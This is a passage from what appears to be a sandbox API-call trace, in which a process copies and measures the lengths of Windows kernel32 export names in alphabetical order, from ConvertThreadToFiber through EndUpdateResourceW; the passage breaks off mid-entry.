(lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.258] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.258] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.258] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.258] lstrlenA (lpString="COPYFILEA") returned 9 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.258] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.258] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.258] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.258] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.258] lstrlenA (lpString="COPYFILEW") returned 9 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.258] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.258] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.258] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.259] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.259] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.259] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.259] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.259] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.259] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.259] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.259] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.259] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.259] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.259] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.259] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.259] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.259] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.259] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.259] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.259] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.259] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.259] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.260] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.260] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.260] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.260] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.260] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.260] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.260] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.260] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.260] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.260] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.260] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.260] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.260] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.260] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.260] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.260] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.260] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.260] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.260] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.261] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.261] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.261] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.261] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.261] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.261] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.261] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.261] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.261] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.261] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.261] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.261] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.261] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.261] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.261] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.261] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.261] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.261] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.261] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.262] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.262] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.262] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.262] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.262] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.262] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.262] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.262] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.262] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.262] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.262] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.262] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.262] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.262] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.262] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.262] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.262] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.262] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.262] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.262] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.263] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.263] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.263] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.263] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.263] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.263] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.263] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.263] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.263] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.263] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.263] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.263] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.263] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.263] lstrlenA (lpString="DELETEATOM") returned 10 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.263] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.263] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.263] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.263] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.263] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.264] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.264] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.264] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.264] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.264] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.264] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.264] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.264] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.264] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.264] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.264] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.264] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.264] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.264] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.265] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.265] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.265] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.265] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.265] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.265] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.265] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.265] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.265] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.265] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.265] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.265] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.266] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.266] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.266] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 